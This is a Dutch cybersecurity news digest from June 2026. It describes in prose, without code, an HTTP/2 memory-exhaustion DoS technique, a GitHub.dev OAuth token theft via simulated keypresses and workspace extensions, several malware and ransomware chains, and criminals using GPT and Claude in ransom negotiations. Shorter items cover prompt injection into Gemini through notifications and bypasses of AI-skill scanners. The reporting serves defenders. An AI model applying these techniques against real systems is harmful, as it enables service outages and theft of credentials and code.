SafeBreach rapporteerde de bevindingen op 17 augustus 2025 aan Google, die de kwetsbaarheid als hoge prioriteit behandelde. Google bevestigde op 14 november 2025 dat verbeteringen aan de content classifier de notificatie-injecties en de 'Delayed Tool Invocation' bypass hadden gemitigeerd. Omdat de oplossing server-side is, is geen app-update nodig. Gebruikers kunnen uit voorzorg de 'Utilities' app ontkoppelen in Gemini's 'Connected Apps' instellingen, of de 'Notification read, reply & control' permissie van de Google app op Android uitschakelen.

 

Bron: SafeBreach | Bron 2: blog.google

04 juni 2026 | Nieuwe 'HTTP/2 Bomb' DoS-aanval legt webservers binnen minuut plat

Een recent ontdekte denial-of-service (DoS) aanval, genaamd 'HTTP/2 Bomb', is in staat om veelgebruikte webservers binnen enkele seconden ontoegankelijk te maken. Deze aanval kan worden uitgevoerd vanaf één enkele machine en misbruikt standaard HTTP/2-configuraties van prominente webserversoftware, waaronder NGINX, Apache HTTP Server, Microsoft IIS, Envoy en Cloudflare Pingora.

De ontdekking werd gedaan door de Codex software agent van OpenAI, onder begeleiding van onderzoekers van het offensieve beveiligingsbedrijf Calif. De 'HTTP/2 Bomb' combineert twee eerder bekende HTTP/2 DoS-methoden: de HPACK-compressie-amplificatie en de Slowloris-stijl resource-retentie via HTTP/2 flow-control stalling. De combinatie van deze technieken heeft een aanzienlijke impact.

Onderzoekers van Calif benadrukken dat een enkele cliënt met een 100 Mbps internetverbinding binnen seconden tientallen gigabytes aan RAM van een kwetsbare server kan uitputten. Dit dwingt de server om geheugen toe te wijzen en voorkomt vervolgens dat dit geheugen weer wordt vrijgegeven. In tests met Apache httpd en Envoy kon een enkele cliënt in ongeveer twintig seconden 32 GB aan servergeheugen verbruiken en vasthouden.

De aanval misbruikt het HPACK-mechanisme van het HTTP/2-protocol, dat wordt gebruikt voor header-compressie. Een aanvaller voegt een header toe aan de dynamische HPACK-tabel en refereert deze vervolgens herhaaldelijk via een compacte geïndexeerde representatie van slechts één byte groot. Het gevolg hiervan is dat een enkele byte die door de aanvaller wordt verzonden, kan resulteren in duizenden bytes aan server-side geheugenallocatie. Envoy en Apache httpd lieten de slechtste ratio's zien, met respectievelijk 5.700:1 en 4.000:1.

Het tweede deel van de aanval richt zich op het voorkomen dat het toegewezen geheugen wordt vrijgegeven nadat een verzoek is voltooid. Dit wordt bereikt door een zero-byte flow-control window te adverteren. In plaats van een volledige respons te versturen, stuurt de server periodiek kleine WINDOW_UPDATE frames om timeouts te vermijden. Hierdoor worden de verzoeken nooit volledig afgerond en blijft het toegewezen geheugen groeien zonder te worden vrijgegeven. Deze methode omzeilt bestaande beveiligingsmaatregelen, zoals limieten op de totale gedecodeerde headergrootte, omdat de headerwaarden die in de aanval worden gebruikt klein zijn en de amplificatie voortkomt uit interne boekhouding en geheugenallocaties per header.

Tests met de nieuwe DoS-aanvalstechniek tegen vier belangrijke webservers leverden de volgende resultaten op:

*   Envoy 1.37.2 putte 32 GB RAM uit in ongeveer 10 seconden.

*   Apache httpd 2.4.67 putte 32 GB RAM uit in ongeveer 18 seconden.

*   nginx 1.29.7 putte 32 GB RAM uit in ongeveer 45 seconden.

*   Microsoft IIS (Windows Server 2025) putte 64 GB RAM uit in ongeveer 45 seconden.

De volledige technische details van de 'HTTP/2 Bomb' DoS-aanval zullen later deze maand worden gepresenteerd door onderzoeker Quang Luong op de Real World AI Security-conferentie. Proof-of-concept (PoC) exploits voor deze nieuwe aanvalsmethode zijn echter reeds gepubliceerd.

Niet alle webservers zijn kwetsbaar voor de 'HTTP/2 Bomb'. Voor sommige platforms zijn al patches uitgebracht. Bovendien kunnen bepaalde aangepaste serverconfiguraties indirecte bescherming bieden. Systemen die achter Content Delivery Networks (CDN's) of reverse proxies draaien, bijvoorbeeld, stellen het kwetsbare HTTP/2-eindpunt niet direct bloot en zijn moeilijker te targeten. Ook kunnen sommige implementaties al beschikken over aangepaste header-count limieten, Web Application Firewalls (WAF's), reverse proxies, of hebben zij HTTP/2 uitgeschakeld.

Het probleem is opgelost in nginx versie 1.29.8 door de introductie van een 'max_headers' directive. Voor Apache httpd mod_http2 2.0.41 is het probleem geïdentificeerd als CVE-2026-49975 en ook hiervoor is een fix beschikbaar. Ten tijde van de publicatie is er nog geen patch beschikbaar voor IIS, Envoy of Pingora. Voor deze webservers wordt aanbevolen om HTTP/2 uit te schakelen waar dit haalbaar is, en een proxy of firewall ervoor te plaatsen die strikte header-count limieten afdwingt.

 

Bron: Calif | Bron 2: github.com | Bron 3: hubs.li

04 juni 2026 | Google DoubleClick misbruikt in nieuwe malspam campagne met DesckVB RAT

Cybersecurityonderzoekers hebben een nieuwe malspam campagne geïdentificeerd die misbruik maakt van het DoubleClick-domein van Google om detectie te omzeilen en uiteindelijk de DesckVB RAT, een remote access trojan, te verspreiden. Volgens een rapport van Huntress-onderzoekers Anna Pham en Adam Mooney, gedeeld met The Hacker News, wordt de lokker door DoubleClick geleid voordat het slachtoffer de door de aanvallers beheerde infrastructuur bereikt. Dit is opmerkelijk omdat DoubleClick een legitiem, door Google beheerd domein is dat door veel beveiligingstools minder snel als verdacht wordt aangemerkt.

Vanaf DoubleClick wordt het slachtoffer doorgestuurd naar een malspam kit die zichzelf dynamisch aanpast met het e-mailadres van het slachtoffer. Deze kit haalt bedrijfsbranding en locatiegegevens op, waardoor de landingspagina overtuigend lijkt zonder dat de operators voor elk doelwit handmatig een lokker hoeven te maken. Dit maakt de operaties schaalbaarder en kosteneffectiever, omdat er geen op maat gemaakte kit nodig is voor elke gerichte organisatie. Het uiteindelijke doel van de campagne is het installeren van DesckVB RAT, een trojan gebaseerd op .NET die sinds februari 2026 actief is.

De aanval begint wanneer een onoplettende gebruiker een HTML-bestand opent dat is bijgevoegd bij een phishing-e-mail. Dit bestand activeert een meta-refresh browseromleiding naar een DoubleClick Campaign Manager URL voor klikregistratie. Vanaf daar wordt de gebruiker naar een andere redirector geleid, die het Base64-gecodeerde e-mailadres decodeert en het slachtoffer naar een landingspagina stuurt met een "Download PDF"-knop. Door op deze knop te klikken, reageert de server met een ZIP-archief dat de rest van de infectieketen initieert.

Dit wordt bereikt door middel van een JavaScript-lader, wiens voornaamste taak is het ophalen en uitvoeren van een .NET RAT zonder op te vallen. Het script extraheert en voert een PowerShell-script uit, dat vervolgens een .NET-lader ophaalt van een externe server. Deze lader fungeert als een stager die controleert of het niet wordt geanalyseerd, de beveiligingscontroles van de machine neutraliseert, persistentie instelt en vervolgens de RAT-payload downloadt en uitvoert. Dit gebeurt via een techniek genaamd process hollowing, waarbij de malware wordt geïnjecteerd in processen die door Microsoft zijn ondertekend.

Eenmaal actief communiceert de trojan met een command-and-control (C2) server via raw TCP-sockets, voert systeemverkenning uit en configureert uitsluitingen voor Microsoft Defender. De trojan patcht ook Antimalware Scan Interface (AMSI) en Event Tracing for Windows (ETW) op native API-niveau, om Windows-telemetrie te verblinden voordat persistentie op de host wordt ingesteld. Dit gebeurt door Run- en RunOnce-registervermeldingen aan te maken en een lader, verantwoordelijk voor het starten van de RAT, in de opstartmap van de gebruiker te plaatsen. De malware kan data extraheren, commando's uitvoeren en aanvullende payloads implementeren, waardoor aanvallers volledige controle krijgen over de geïnfecteerde machines. Tegelijkertijd neemt de malware stappen om onder de radar te blijven door de machine te beëindigen en opnieuw op te starten als het een analysetool detecteert of vaststelt dat het in een sandbox-omgeving draait.

Huntress benadrukt het belang van verdediging in de diepte. Het configureren van een Group Policy Object (GPO) in Active Directory om scriptbestanden zoals .vbs, .hta en .js standaard in Kladblok te openen, kan een dreigingsactor in de allereerste fase stoppen, waardoor verdere payloads nooit worden gedropt. Op het gebied van e-mailbeveiliging moeten organisaties overwegen DMARC-, DKIM- en SPF-records te implementeren om de kans te verkleinen dat gespoofde of kwaadaardige e-mails eindgebruikers bereiken. Bovendien voegt een e-mailgatewayoplossing die bijlagen en links kan sandboxing voordat ze worden afgeleverd, een zinvolle extra beschermingslaag toe.

 

Bron: Huntress | Bron 2: learn.microsoft.com

04 juni 2026 | ‘The Gentlemen’ ransomwaregroep zet Fortinet-exploits en AI in

De Russischtalige ransomwaregroep die bekendstaat als ‘The Gentlemen’ is in 2026 snel uitgegroeid tot een van de meest actieve dreigingen, alleen overtroffen door Qilin. Hun arsenaal omvat het misbruiken van kwetsbaarheden in Fortinet-producten, operaties met AI-ondersteuning en een volledig op maat gemaakt command-and-control (C2) framework dat door de meeste beveiligingstools niet wordt gedetecteerd.

De groep opereert zonder centraal kantoor of traditionele salarisstructuur. Negen operatorhandles zijn geïdentificeerd die via een zelf gehoste Rocket.Chat-instantie op een onion-site met elkaar communiceren, met plannen om te migreren naar een platform gebaseerd op Rust. Dit slanke, gedistribueerde model markeert een duidelijke verschuiving van de rigide bedrijfsstructuur die groepen zoals Contionce hanteerden.

In mei 2026 wist het Ransom-ISAC onderzoeksteam 3.366 berichten te extraheren van de Rocket.Chat server van The Gentlemen. Deze berichten onthulden interne plannen, discussies over tools en details over slachtofferdoelwitten. Analisten van Vectra AI merkten in een rapport, gedeeld met Cyber Security News (CSN), op dat hoewel de tools van de groep aanzienlijk zijn veranderd, de belangrijkste zwakke punten die ze in slachtoffernetwerken misbruiken sinds 2022 vrijwel hetzelfde zijn gebleven.

De gelekte berichten brachten ook een connectie aan het licht tussen The Gentlemen en eerdere ransomwaremerken. Een onderhandelaar, bekend onder de handle “Tinker”, verscheen zowel in Black Basta-chats als in de logboeken van The Gentlemen, waarbij dezelfde operationele rol binnen beide groepen werd vervuld. Een gedeelde Matrix-homeserver, bestflowers247.online, was aanwezig in archieven van beide groepen, wat de infrastructuurverbinding met hard bewijs verankert. Dit patroon wijst erop dat ransomware-operators niet met pensioen gaan, maar rebranden. Dezelfde personen dragen hun kennis en toegang over van de ene criminele onderneming naar de volgende, waardoor de ontmanteling van groepen veel minder effectief is dan veel verdedigers zouden hopen.

Fortinet blijft de voorkeursingang voor The Gentlemen. De Rocket.Chat-logboeken vermelden FortiGate 81 keer, waarbij CVE-2024-55591, een authenticatie-bypass kwetsbaarheid in FortiOS, expliciet wordt genoemd als hun primaire toegangspunt tot slachtoffernetwerken. Een afzonderlijke analyse van Halcyon toonde aan dat de groep ongeveer 1.000 Fortinet VPN’s brute-forcet, in sommige gevallen met hergebruikte wachtwoorden zoals 'gentlemen25' en 'gentle26' bij meerdere slachtoffers.

Eenmaal binnen implementeert de groep een op maat gemaakt C2-framework genaamd G-BOT. Dit voorheen ongedocumenteerde controlepaneel ondersteunt per-beacon SOCKS5-tunneling en uploadt builders naar tijdelijke bestandssites, ter vervanging van commerciële tools zoals Cobalt Strike. Die overstap maakt detectie moeilijker voor beveiligingsteams die afhankelijk zijn van bekende signatures.

De groep richt zich ook rechtstreeks op hypervisors. Hun Linux-locker valt Hyper-V Volume Manager aan en versleutelt op hypervisor-niveau, zodat endpoint-agents binnen virtuele machines de aanval niet kunnen zien. De locker laat de extensie .i8p14s achter en een losgeldbrief met de naam README-GENTLEMEN.txt, wat aangeeft dat geen enkele infrastructuurlaag buiten bereik is.

The Gentlemen hebben AI van een nieuwigheid omgezet in een werkend onderdeel van hun operatie. Operators verwijzen naar het gebruik van GPT- en Claude-modellen om te helpen bij onderhandelingen over losgeld, waarbij één operator ze beschrijft als automatische antwoordschrijvers voor communicatie met slachtoffers. De groep bespreekt ook het huren van GPU's op vast.ai en het draaien van ongecensureerde AI modellen van Hugging Face om grote hoeveelheden gestolen data te triageren.

Voor credential theft vertrouwt de groep op Phemedrone StealerV2.3.2, LummaC2, XenAllPasswordPro, Chrome App-Bound Encryption Decryption en DumpBrowserSecrets. Deze tools halen opgeslagen wachtwoorden rechtstreeks uit browsers zonder mislukte logins te activeren, wat betekent dat standaard authenticatielogboeken niets ongewoons laten zien. Gestolen data wordt vervolgens via rclone naar MEGA verplaatst, volgens hetzelfde exfiltratiepatroon dat ransomwaregroepen al jaren gebruiken.

Verdedigers kunnen concrete stappen ondernemen op basis van de gelekte chats. Beveiligingsteams moeten edge-apparaten, waaronder Palo Alto, Fortinet, Citrix, F5 en Cisco-apparatuur, controleren op de CVE-lijst die in de operator-chats is besproken. Het behandelen van NTDS.dit en VSS-back-up toegang als een urgentie één-waarschuwing, in plaats van een forensische ontdekking weken later, kan compromittering van het hele domein stoppen voordat deze zich volledig ontwikkelt. Het opsporen van tools zoals rclone, MEGAcmd, WinSCP en Velociraptor op hosts die deze niet horen te draaien, voegt een vroege waarschuwingslaag toe die logboeken alleen niet kunnen bieden.

 

Bron: Vectra AI

04 juni 2026 | One-click aanval via GitHub.dev en VS Code steelt GitHub OAuth tokens

Cybersecurityonderzoekers hebben een one-click aanvalsmethode onthuld die via Microsoft Visual Studio Code (VS Code) het stelen van GitHub OAuth tokens mogelijk maakt. De aanval, die is gedetailleerd door beveiligingsonderzoeker Ammar Askar, kan leiden tot de diefstal van tokens met volledige lees- en schrijfrechten voor alle repositories van een gebruiker, inclusief private.

De kwetsbaarheid bevindt zich in GitHub.dev, een lichtgewicht webgebaseerde broncode-editor die als een VS Code-omgeving in de sandbox van de webbrowser draait. GitHub.dev maakt het voor gebruikers mogelijk om pull-requests te versturen en commits te maken. Deze functionaliteit wordt bereikt doordat github.com een OAuth token via een POST-verzoek naar github.dev stuurt, waarmee het namens de gebruiker kan communiceren met GitHub. Askar benadrukt dat dit token niet beperkt is tot de specifieke repository waarmee is gecommuniceerd, maar volledige toegang biedt tot alle andere repositories waartoe de gebruiker toegang heeft.

De kern van de kwetsbaarheid stelt aanvallers in staat om kwaadaardige VS Code extensies te installeren die GitHub OAuth tokens stelen wanneer deze worden doorgegeven aan GitHub.dev. Dit wordt bereikt door misbruik te maken van een message-passing mechanisme tussen het hoofdvenster van VS Code en webviews. Webviews worden gebruikt voor het renderen van Markdown-previews of het bewerken van Jupyter notebooks.

Specifiek werkt de exploit door kwaadaardig JavaScript uit te voeren binnen een niet-vertrouwde webview. Dit JavaScript simuleert keypresses, ook wel keydown-events genoemd, in het hoofdvenster van de editor. Hierdoor wordt de Command Palette geopend via de toetscombinatie "Ctrl+Shift+P". Vervolgens wordt een door de aanvaller gecontroleerde extensie geïnstalleerd. Deze extensie extraheert het GitHub OAuth token dat naar GitHub.dev is verzonden en gebruikt de GitHub API om alle private repositories op te vragen waartoe het slachtoffer toegang heeft.

De aanpak maakt ook gebruik van een VS Code-functionaliteit genaamd 'local workspace extensions'. Deze functie maakt het mogelijk om een extensie direct te installeren zonder een extra vertrouwensdialoogvenster te presenteren, zolang deze in de map ".vscode/extensions" binnen die workspace is geplaatst. Dit omzeilt effectief de publisher trust check. De onderzoeker legde uit dat extensies als onderdeel van hun package.json extra keybindings aan VS Code kunnen toevoegen. Aangezien keybindings betrouwbaar kunnen worden geactiveerd, kan een keybind worden toegevoegd voor elk gewenst VS Code-commando, zoals het installeren van een extensie terwijl de trusted publisher check wordt overgeslagen.

De kwetsbaarheid werd op 2 juni 2026 aan GitHub gemeld. Een uur later werden details van het probleem publiekelijk bekendgemaakt, mede vanwege Microsofts eerdere omgang met VS Code-gerelateerde bugs. Microsoft heeft de kwetsbaarheid erkend en heeft inmiddels een oplossing geïmplementeerd. Alexandru Dima, een partner software engineering manager bij Microsoft, heeft verduidelijkt dat dit probleem geen invloed had op VS Code Desktop. Een woordvoerder van Microsoft heeft na publicatie bevestigd dat de kwetsbaarheid voor hun diensten is verholpen en dat geen actie van klanten vereist is.

 

Bron: Ammar Askar | Bron 2: github.com

04 juni 2026 | Met China verbonden TA4922 breidt aanvallen met SilentRunLoader malware uit naar Europa

Een vermoedelijke cybercrimegroep met banden met China, genaamd TA4922, die eerder bekendstond om aanvallen op organisaties in Oost-Azië, richt zich nu ook op organisaties in het Verenigd Koninkrijk, Duitsland, Italië en Zuid-Afrika. Onderzoekers van Proofpoint melden dat de groep de aanvallen de afgelopen maanden heeft opgevoerd, waarbij bekende phishingtactieken worden gecombineerd met een groeiend arsenaal aan malware. De activiteiten omvatten diefstal van inloggegevens, fraudepogingen, malware voor externe toegang en het misbruik van legitieme software voor extern beheer om toegang tot slachtoffernetwerken te behouden.

Voor Britse organisaties omvatten de meest relevante activiteiten e-mails die zijn ontworpen om te lijken op routinecommunicatie van de overheid of bedrijven. Eén campagne deed zich voor als belastingdienst en verwees naar btw-aangiftes, loonbelastingdocumenten en compliance. Een andere campagne gebruikte berichten met een thema rond uitkeringen en compliance, die de taal van overheids- en universele uitkeringsdiensten kopieerden. Volgens de onderzoekers waren deze lokmiddelen niet generieke spam, maar opgesteld rond lokale bedrijfsprocessen waar werknemers al mee te maken hebben, zoals belastingpapieren, HR-mededelingen, salarisbestanden, facturen en complianceverzoeken. Deze aanpak vergroot de kans dat een ontvanger een bestand opent, op een link klikt of de conversatie naar een ander kanaal verplaatst.

Proofpoint meldt dat TA4922 historisch gezien Japan en andere delen van Azië, waaronder Taiwan, Korea, Singapore en India, heeft geviseerd. De recentere activiteit suggereert dat de groep een grotere groep slachtoffers test, waarbij Europese en Afrikaanse organisaties nu in de campagnes verschijnen.

De malware-toolkit van de groep is ook uitgebreid. Proofpoint rapporteerde het gebruik van varianten van ValleyRAT, ook bekend als Winos4.0, Atlas RAT, RomulusLoader en SilentRunLoader. Elke tool speelt een andere rol, van het verkrijgen van externe toegang tot het laden van verdere payloads of het stelen van browsergegevens. SilentRunLoader, een nieuwere Python-gebaseerde stealer en loader, is waarschijnlijk ontwikkeld met behulp van grote taalmodellen (LLM's). Het is een van de meest opvallende toevoegingen aan de toolkit van TA4922, omdat het gericht is op gegevens die zijn opgeslagen in Google Chrome. Proofpoint stelt dat de malware opgeslagen inloggegevens, cookies en browse-informatie kan verzamelen voordat de gegevens naar door aanvallers beheerde infrastructuur worden verzonden. In de Britse campagne met belastingthema werd de malware gehost via MediaFire en geleverd via links in e-mails.

TA4922 heeft ook gebruikgemaakt van DLL sideloading, een techniek waarbij een kwaadaardig bestand wordt geladen door een legitiem uitvoerbaar bestand. Voor een slachtoffer kan het bestand deel lijken uit te maken van een normaal documentpakket of een bedrijfsapplicatie. In de praktijk kan het malware starten, terwijl de activiteit moeilijker op te sporen is tijdens routinematige scans. Een ander onderdeel van de modus operandi van de groep is het gebruik van legitieme tools voor extern beheer zoals AnyDesk en SyncFuture. Deze producten hebben geldige zakelijke toepassingen, maar aanvallers kunnen ze misbruiken nadat ze toegang hebben verkregen, waardoor ze systemen kunnen beheren terwijl hun activiteit minder duidelijk kwaadaardig lijkt.

Proofpoint schatte ook met grote zekerheid in dat een deel van de nieuwere malware voor Python van TA4922 waarschijnlijk is ontwikkeld met behulp van grote taalmodellen. Onderzoekers wezen op codecommentaar, strings en ongewijzigde placeholderwaarden als tekenen dat de actor mogelijk AI tools gebruikt om sneller malware te produceren. Proofpoint's rapport stelt dat de actor financieel gemotiveerd lijkt, met activiteiten gericht op externe toegang, gegevensdiefstal, fraude, doorverkopen van toegang of persistente toegang. Hoewel sommige tools van TA4922 overeenkomsten vertonen met die gebruikt in spionagezaken, behandelt Proofpoint de groep als een aparte cybercrime-operatie. De uitbreiding van de groep naar het Verenigd Koninkrijk en andere regio's toont aan dat campagnes die ooit geconcentreerd waren in Oost-Azië, nu een directe zorg worden voor meer internationale organisaties. Organisaties moeten zich bewust zijn van cyberaanvallen met een administratief thema, waarbij belastingaangiftes, loonlijsten, uitkeringsberichten en complianceverzoeken op het eerste gezicht gewoon kunnen lijken, maar een nuttige dekmantel vormen voor aanvallers.

 

Bron: Proofpoint | Bron 2: hexastrike.com

04 juni 2026 | Google introduceert Android-beveiliging tegen AI deepfake scam-oproepen

Google heeft een nieuwe beveiligingsfunctie voor Android geïntroduceerd, genaamd "fake call detection", die is ontworpen om telefoongesprekken te detecteren en te markeren waarbij cybercriminelen gebruikmaken van kunstmatige intelligentie om persoonlijke contacten van gebruikers te imiteren. De functie wordt deze maand wereldwijd uitgerold naar apparaten met Android 12 en hoger, beginnend met Pixel-toestellen, en zal standaard zijn ingeschakeld.

De 'fake call detection' werkt automatisch wanneer zowel de beller als de ontvanger de telefoonapplicatie van Google gebruiken. Zodra een contact een oproep plaatst, stuurt diens apparaat in realtime een stil, versleuteld bevestigingssignaal naar het apparaat van de ontvanger. Als dit signaal ontbreekt, wat kan duiden op spoofing, zal het apparaat van de ontvanger ter verificatie contact opnemen met de daadwerkelijke telefoon van het contact. Indien het apparaat van het contact bevestigt geen oproep te plaatsen, ontvangt de ontvanger direct een waarschuwing op het scherm met het advies om op te hangen. Deze proactieve melding is bedoeld om te voorkomen dat gebruikers slachtoffer worden van deepfake-imitatie en call spoofing.

De nieuwe beveiligingsfunctie is gebaseerd op de open standaard voor Rich Communication Services (RCS) en functioneert uitsluitend op Android-apparaten waarop de apps Telefoon van Google, Contacten en Berichten van Google (met ingeschakelde RCS) zijn geïnstalleerd. Google stelt dat deze functie twee veelvoorkomende fraudetactieken aanpakt: het spoofen van het telefoonnummer van een bekend contact en het gelijktijdig gebruiken van AI-stemkloneringstechnologie om de stem van die persoon na te bootsen.

De U.S. Federal Trade Commission (FTC) waarschuwde vorig jaar dat de gerapporteerde verliezen door impersonatie-scams in 2024 alleen al $2,95 miljard bedroegen. Het Global Financial Fraud Threat Assessment van INTERPOL uit maart 2026 identificeerde fraude via impersonatie als een van de belangrijkste dreigingen die vorig jaar wereldwijd bijdroegen aan meer dan $440 miljard aan verliezen. Google benadrukt dat, hoewel mensen jarenlang vertrouwden op nummerweergave om te weten wie er aan de lijn was, dit door de nieuwe tactieken van oplichters niet langer afdoende is. Gebruikers die een andere telefoonapplicatie gebruiken, kunnen de Telefoon van Google app vanuit de Play Store installeren en deze als standaard instellen om zich beter te beschermen tegen valse oproepen.

In december heeft Google ook de ondersteuning voor Android-bescherming tegen scam-oproepen tijdens gesprekken uitgebreid naar diverse banken en financiële apps in de Verenigde Staten, waaronder Cash App en de mobiele bankapp van JPMorganChase.

 

Bron: wiz.io | Bron 2: ftc.gov | Bron 3: interpol.int

05 juni 2026 | PCPJack kaapt 230 cloudservers voor verborgen SMTP-relaynetwerk

De dreigingsactor bekend als PCPJack heeft cloudservers, geassocieerd met Amazon Web Services (AWS), Google Cloud en Microsoft Azure, gekaapt om een verborgen SMTP-e-mailrelaynetwerk op te zetten. Dit netwerk omvat gecompromitteerde zakelijke servers in de Verenigde Staten, Europa en Azië, die stilletjes zijn omgezet in SMTP-proxies. Deze proxies zijn geverifieerd op hun e-mailrelay functionaliteit en elke vijf minuten gesynchroniseerd met een downstream ontvanger. De infrastructuur was nog actief toen deze werd ontdekt, zo meldt dreigingsinformatiebedrijf Hunt.io.

Hunt.io deed de ontdekking nadat de dreigingsactor achter de operatie twee open directory's op een command en control (C2) server (213.136.80[.]73) zonder enige authenticatie had achtergelaten. In deze directory's werden onder andere broncode, gecompileerde binaire bestanden, logs van de implementatiestatus, internetscanners, exploitatie tools en een live Sliver configuratie aangetroffen.

PCPJack kwam voor het eerst aan het licht in april 2026, toen SentinelOne een framework voor het stelen van inloggegevens identificeerde dat specifiek gericht was op clouddiensten. Opvallend was dat PCPJack maatregelen nam om processen of artefacten van TeamPCP te beëindigen en te verwijderen, een andere bekende hackergroep die recent aandacht trok met aanvallen op softwaretoeleveringsketens.

Een van de open directory's bevatte een met Sliver geïntegreerde SMTP-proxy-implementatie toolkit, samen met Chisel tunneling en proxy binaire bestanden voor de meeste Linux CPU-architecturen, zoals AMD64, ARM64 en x86. Aan de slachtofferkant wordt het binaire bestand gedropt als een verborgen bestand met een punt als voorvoegsel en blijft het bestaan op "/var/tmp/.xs."

Verder werden in de directory's deployer scripts gevonden. Deze scripts zijn ontworpen om de Sliver C2 client configuratie te laden en te filteren op Linux beacons die binnen de laatste tien minuten hebben ingecheckt. Beacons zijn implantaten die periodiek contact opnemen met de C2 server om te controleren op commando's. Elke beacon ontvangt een SOCKS5-proxy poort die deterministisch is afgeleid van een MD5-hash van zijn Sliver UUID, en wordt toegewezen aan het bereik 10000-14999. Dit elimineert de noodzaak voor een gedeeld poort register.

Het script is ook in staat om een SMTP-kwaliteitspoort uit te voeren die controleert op uitgaande toegang tot smtp.gmail[.]com:587. Hosts die deze controle niet doorstaan, worden overgeslagen. Dit definieert het doel van de operatie: hosts die geen e-mail kunnen doorsturen, hebben geen waarde voor deze pijplijn. Beacons worden verwerkt in batches van 50, met een wachttijd van 25 minuten na uploads en 15 minuten na uitvoeringscommando's, om langzame beacon check-ins op te vangen.

Latere versies van de deployer scripts bleken de SMTP-poort en de batch-logica te verwijderen. Ook aanwezig is een diagnostisch script dat vijf actieve beacons selecteert en hen elk een shell commando geeft dat controleert op de aanwezigheid van Chisel binaire bestanden op bekende droppaden, een lopend Chisel proces, de bereikbaarheid van poort 9000 op de C2, en de aanwezigheid van persistentie artefacten, zoals de cron-ingang of de systemd-service.

Bovendien draait de C2 server een Python script genaamd "chisel_verifier.py" als een persistent achtergrondprogramma. Dit script inventariseert elke 60 seconden actieve Chisel tunnelpoorten via `ss -tlnp`, test elke nieuwe poort op SMTP-functionaliteit en verwijdert mislukte of verloren tunnels uit de actieve pool. Geverifieerde proxies worden verrijkt met exit IP-adres, land en ASN via diensten zoals api.ipify[.]org en ip-api[.]com. De proxylijsten worden vervolgens elke vijf minuten gesynchroniseerd via het Secure Copy Protocol (SCP) naar een aparte downstream server op 38.242.204[.]245. Deze server is momenteel niet toegankelijk. Het uiteindelijke doel van de operatie is in dit stadium nog onduidelijk.

Hunt.io beschrijft de campagne als opportunistisch en stelt dat de 230-node uitkomst het waarneembare resultaat is. Of deze progressie een enkele operator weerspiegelt die herhaalt, of meerdere actoren die dezelfde infrastructuur delen, kan niet worden vastgesteld uit de teruggevonden bestanden. De geverifieerde proxylijst wordt elke vijf minuten gesynchroniseerd met die server, en iemand verbruikt deze. Of het nu voor spam, phishing of iets anders is, de infrastructuur om op schaal te leveren was duidelijk operationeel.

 

Bron: Hunt.io

05 juni 2026 | Dashlane: Hackers omzeilen 2FA om versleutelde wachtwoordkluizen te downloaden

Dashlane heeft bekendgemaakt dat dreigingsactoren erin geslaagd zijn om de authenticatie met twee factoren (2FA) te omzeilen via een brute-force aanval. Hierdoor konden ongeautoriseerde apparaten worden geregistreerd en versleutelde wachtwoordkluizen worden gedownload van minder dan twintig gebruikers van persoonlijke abonnementen. Een afgerond onderzoek bevestigt dat er geen bredere impact is geweest op de interne systemen van Dashlane.

De aanval begon op zondag 31 mei 2026, toen een externe dreigingsactor een brute-force campagne met hoog volume lanceerde gericht op gebruikersaccounts van Dashlane. De aanvaller concentreerde zich specifiek op de API-eindpunten voor apparaatregistratie van het platform. Hierbij werden geautomatiseerde verzoeken verstuurd om zescijferige eenmalige tokens te raden, die via e-mail of authenticator apps worden verzonden.

De geautomatiseerde beveiligingscontroles van Dashlane reageerden zoals bedoeld, wat leidde tot accountvergrendelingen bij de getroffen accounts voordat de aanval volledig werd ingedamd. De dreigingsactor maakte misbruik van het apparaatregistratieproces van Dashlane, dat wordt geactiveerd wanneer een gebruiker een nieuw apparaat, zoals een mobiele telefoon of computer, aan zijn account toevoegt.

Na succesvolle 2FA-verificatie registreert Dashlane het apparaat en downloadt automatisch een kopie van de versleutelde kluis naar dat apparaat. Door geldige zescijferige tokens voor een subset van accounts te brute-forcen, konden aanvallers het registratieproces voltooien. Dit resulteerde in de effectieve autorisatie van het apparaat en het downloaden van versleutelde kluiskopieën zonder medeweten van de accounthouder.

Minder dan twintig gebruikers van persoonlijke abonnementen kregen hun versleutelde kluizen geëxfiltreerd. Alle getroffen gebruikers zijn direct door Dashlane op de hoogte gebracht. Ondanks het downloaden van de kluizen, stelt Dashlane dat de gestolen gegevens effectief ontoegankelijk blijven. De inhoud van de kluizen wordt beschermd door het hoofdwachtwoord van de gebruiker, dat nooit in platte tekst naar Dashlane servers wordt verzonden en nooit wordt opgeslagen. Dit is een kernprincipe van Dashlane's zero-knowledge architectuur.

De versleutelingsstack, bestaande uit Argon2 + AES-256-CBC + HMAC-SHA256, maakt het brute-forcen van het hoofdwachtwoord statistisch onhaalbaar, zelfs over langere periodes. Er is geen bewijs dat de interne infrastructuur van Dashlane op enig moment tijdens het incident is gecompromitteerd. Op 4 juni 2026 kondigde Dashlane de voltooiing van het onderzoek aan, waarbij werd bevestigd dat er geen aanvullende impact op klanten was. De herstelmaatregelen omvatten: het blokkeren van kwaadaardig verkeer op netwerkniveau, het reactiveren van opgeschorte en vergrendelde gebruikersaccounts, het implementeren van extra verificatielagen in het apparaatregistratieproces en het verharden van de beveiliging van API-eindpunten om toekomstig kwaadaardig verkeer te detecteren en te filteren. Het incident onderstreept dat zelfs robuuste wachtwoordmanagers kunnen worden aangevallen aan de authenticatieperimeter in plaats van de versleutelingslaag zelf, waardoor sterke 2FA-configuratie en hygiëne van het hoofdwachtwoord cruciale verdedigingsmechanismen zijn voor alle gebruikers.

 

Bron: Dashlane

05 juni 2026 | Nieuwe bypass-technieken omzeilen AI-skillscanners, creëren supply chain risico

Onderzoek heeft uitgewezen dat AI-skillscanners van platforms zoals ClawHub, Cisco en Vercel kunnen worden omzeild. Dit maakt het mogelijk voor kwaadaardige skills om te worden geüpload en verspreid via openbare marktplaatsen, wat een groeiend risico vormt voor de toeleveringsketen in ecosystemen van agents. Skills fungeren hierbij als herbruikbare componenten die code kunnen uitvoeren en het gedrag van modellen kunnen beïnvloeden.

